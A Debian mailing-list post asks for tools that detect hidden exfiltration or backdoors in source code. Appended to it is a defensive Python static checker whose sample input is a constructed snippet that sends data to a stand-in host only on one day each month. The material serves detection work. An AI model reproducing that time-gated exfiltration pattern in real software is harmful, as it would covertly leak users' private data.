source code "forensic" practices

Dear Debian People,

I ITPed a package which unfortunately ended up not providing the original
sources (the sources everybody gets had their indentation removed). The
unreasonable refusal to provide the original source forced me to question
the good intent of the author to provide useful and spam/crap-free
software. Since I could not possibly examine that code, I've decided to
look at other software written by the same author which does have original
source code, and which probably nobody else has ever examined anyway.

The question is: are there any helper tools for doing source code
validation with respect to possibly present snippets of code which might
be for illegal activity (i.e. sending out private information, or serving
as backdoors, etc.)? Maybe some language-specific tools (JS, Java, Python)
which could catch snippets intended for data transmission/receipt?

Sniffing the traffic of a running app is an effective utility but
can't always be applied (I could write code which sends out information
only once a month on a random date/time; I doubt that anyone would
monitor/analyze all the monthly traffic to catch me), especially if a
particular application is an extension to a bigger application (like
Mozilla products' extensions).

It becomes an especially hard task when checking extensions to Internet
appliances such as web browsers, which can provide a rich API for the
purpose of data transmission/receipt, and where packets from a specific
extension would be buried in the rest of the traffic coming out of
the application.

=------------------------------   /v\  ----------------------------=
Keep in touch                    // \\     (yoh@|www.)onerussian.com
Yaroslav Halchenko              /(   )\               ICQ#: 60653192
                   Linux User    ^^-^^    [175555]
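
An added example, not part of the original message: a minimal static check of
the kind the question asks about, for Python sources only, which flags code
that can reach the network together with a date/time trigger that traffic
sniffing would likely miss. The function names, the module lists and the
sample input are assumptions made for illustration.

```python
import ast

# Top-level modules that give code a way to talk to the network (starting list, an assumption).
NETWORK_MODULES = {"socket", "ssl", "http", "urllib", "ftplib", "smtplib", "requests"}
# Modules commonly involved in time-gated, randomized or encoded behaviour.
TRIGGER_MODULES = {"datetime", "time", "random", "base64"}
# Builtins that run code assembled at runtime, hiding it from a plain read of the source.
DYNAMIC_CALLS = {"eval", "exec", "compile", "__import__"}

def audit_source(source, filename="<string>"):
    """Return sorted (line, category, detail) findings for one Python source text."""
    findings = []
    for node in ast.walk(ast.parse(source, filename)):
        names = []
        if isinstance(node, ast.Import):
            names = [alias.name for alias in node.names]
        elif isinstance(node, ast.ImportFrom):
            names = [node.module or ""]  # relative imports have no module name
        for name in names:
            top = name.split(".")[0]
            if top in NETWORK_MODULES:
                findings.append((node.lineno, "network", name))
            elif top in TRIGGER_MODULES:
                findings.append((node.lineno, "trigger", name))
        if (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
                and node.func.id in DYNAMIC_CALLS):
            findings.append((node.lineno, "dynamic", node.func.id))
    return sorted(findings)

def needs_manual_review(findings):
    """True when network access coexists with a trigger or runtime-built code."""
    categories = {category for _, category, _ in findings}
    return "network" in categories and bool(categories & {"trigger", "dynamic"})

# Constructed sample input: sends data only on one day of the month.
SAMPLE = '''\
import os
import datetime
from urllib import request

def save(text):
    if datetime.date.today().day == 13:
        request.urlopen("http://stats.example/u", data=text.encode())
'''

if __name__ == "__main__":
    report = audit_source(SAMPLE)
    print(report, needs_manual_review(report))
```

A hit only marks a file for reading by hand; names reached through aliases or
built from strings at runtime are not resolved by this check.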